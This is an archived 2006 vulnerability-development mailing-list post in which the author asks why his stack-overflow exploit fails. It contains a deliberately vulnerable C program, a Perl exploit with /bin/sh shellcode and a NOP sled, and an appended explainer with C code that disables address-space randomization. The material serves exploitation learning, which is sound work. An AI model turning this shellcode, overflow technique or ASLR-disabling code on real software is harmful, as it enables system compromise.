Vulnerability Development mailing list archives

"Moving" Stack: my poor return address!


From: Jack C <list-recv () crepinc com>
Date: Mon, 31 Jul 2006 22:03:33 -0400

Hello,

To see if I still knew how to code simple buffer overflows after a long absence from it, I threw together a quick vulnerable C program today and wrote an exploit for it. The whole process went great, until I went to find the return address I wanted in the stack. I have a 4096 byte buffer, and since I had the room I put in 2048 NOPs at the beginning of the buffer. However, when I run the exploit then open the core in gdb, the stack is always in a different place. And we're not talking about different place by a few thousand bytes, either. One time I'll run it and the NOPs will be at 0xbfe4dab0, the next time they will be at 0xbf9af420. That's a HUGE distance away!

I'm running on Fedora 5. Is this a security thing that's new in the past 2 years or so since I've coded one of these? Is there any way I can either (1) make the stack sit still so I can point into it or (2) find out where it is during execution?

------- lame.c ------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strcpy() */

int main( int argc, char *argv[]) {

 char buffer[4096]; //we're gonna overflow this jawn

 if (argc!=2) {
   printf("Usage: %s <string to copy>\n",argv[0]);
   return 1;
 }

 strcpy(buffer,argv[1]); //tisk tisk tisk

 printf("Buffer now holds: %s\n",buffer);

 return 0;
}
-----end lame.c -----

------exp.pl -----
#!/usr/bin/perl
use strict;
use warnings;

my $prog="/home/jack/break/lame";
my $buffer;

# shellcode - /bin/sh; uname -a; id | 89 bytes
my $c0de="\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07".
        "\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b".
        "\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff".
        "\xff\xff\x03\x65\x63\x68\x6f\x20\x5b\x45\x6c\x65".
        "\x63\x74\x72\x6f\x6e\x69\x63\x53\x6f\x75\x6c\x73".
        "\x5d\x3b\x20\x75\x6e\x61\x6d\x65\x20\x2d\x61\x3b".
        "\x20\x69\x64\x3b\x20\x03\x2d\x63\x02\x2f\x62\x69".
        "\x6e\x2f\x73\x68\x01";

$buffer="\x90"x(2048+(1024-length($c0de))); #NOPs (pad to 3072 bytes total)
$buffer.=$c0de;                             #shellcode
$buffer.="\xc0\x15\x9d\xbf"x(1024/4); #ret addr: 0xbf9d15c0 WAS in the middle...

# other addresses the NOPS were... look how far apart these are!
#0xbfe4dab0-0xbfe4e640
#0xbf9af420-0xbf9affa0

exec $prog, $buffer;
-----end exp.pl------

Thanks for looking, hope someone can lend a hand...

-Jack Carrozzo
jack   _{@}_   crepinc.com
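What Jack is seeing is the kernel's address space randomization: on every execve() the stack base is placed at a random offset (mainline Linux since 2.6.12, and earlier in Fedora's Exec Shield kernels), so a return address that was "in the middle" of the sled on one run points somewhere else on the next. The following is an added example written for this archive page, not code from the original post. It uses the two stack addresses quoted above to show that the observed shift between runs (about 4.6 MB) dwarfs a 2048-byte NOP sled, and it shows the Linux-specific way to pin the stack for a debugging session: set ADDR_NO_RANDOMIZE via personality(2) and re-exec, which is what `setarch -R` does. The re-exec through /proc/self/exe and the ASLR_PROBE_REEXEC environment variable are conveniences chosen for this example. One caveat a practitioner should know: a seccomp policy (for example the default Docker profile) may refuse that personality() call, in which case the program reports it and carries on with randomization enabled.

```c
/* aslr_probe.c: added example, not part of the original post.
 *   cc -Wall -o aslr_probe aslr_probe.c && ./aslr_probe && ./aslr_probe
 * Run it twice with randomization on and the probe address changes;
 * once ADDR_NO_RANDOMIZE takes effect it stays put. */
#define _GNU_SOURCE
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/personality.h>

/* Bytes the stack moved between two runs (order-independent). */
static uintptr_t stack_shift(uintptr_t a, uintptr_t b)
{
    return a > b ? a - b : b - a;
}

/* A fixed return address can land in the sled on both runs only if the
 * sled is strictly longer than the distance the stack moved. */
static int sled_covers_shift(size_t sled_len, uintptr_t shift)
{
    return sled_len > shift;
}

/* 1 = randomization already off for this process, 0 = on, -1 = unknown.
 * personality(0xffffffff) queries the current persona without changing it. */
static int randomization_disabled(void)
{
    int p = personality(0xffffffff);
    if (p == -1)
        return -1;
    return (p & ADDR_NO_RANDOMIZE) ? 1 : 0;
}

/* Ask the kernel to stop randomizing; the flag only takes effect at the
 * next execve(). Returns 1 on success, 0 if the kernel or a seccomp
 * filter refused the call. */
static int request_no_randomize(void)
{
    int p = personality(0xffffffff);
    if (p == -1)
        return 0;
    return personality(p | ADDR_NO_RANDOMIZE) == -1 ? 0 : 1;
}

/* Address of a stack local; compare it across runs to watch the stack move. */
static uintptr_t stack_probe(void)
{
    volatile char marker[64];
    marker[0] = 0;
    return (uintptr_t)marker;
}

int main(int argc, char **argv)
{
    (void)argc;
    /* ASLR_PROBE_REEXEC is an assumed marker so we re-exec at most once. */
    if (randomization_disabled() != 1 && getenv("ASLR_PROBE_REEXEC") == NULL) {
        if (request_no_randomize()) {
            setenv("ASLR_PROBE_REEXEC", "1", 1);
            execv("/proc/self/exe", argv); /* restart with the flag in effect */
            perror("execv");
        } else {
            fprintf(stderr, "could not disable randomization: %s\n",
                    strerror(errno));
        }
    }

    printf("stack local at %p (randomization %s)\n", (void *)stack_probe(),
           randomization_disabled() == 1 ? "off" : "on");

    /* The two NOP-sled start addresses quoted in the post. */
    uintptr_t shift = stack_shift(0xbfe4dab0u, 0xbf9af420u);
    printf("shift between the two runs: %lu bytes; a 2048-byte sled covers it: %s\n",
           (unsigned long)shift, sled_covers_shift(2048, shift) ? "yes" : "no");
    return 0;
}
```

The arithmetic is the real answer to question (1): on 32-bit Linux the stack base can move by several megabytes between runs, so no sled that fits in a 4 KB buffer can absorb it; you either turn randomization off for the target (personality, `setarch -R`, or the system-wide `/proc/sys/kernel/randomize_va_space` knob) or you stop depending on a fixed stack address at all.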


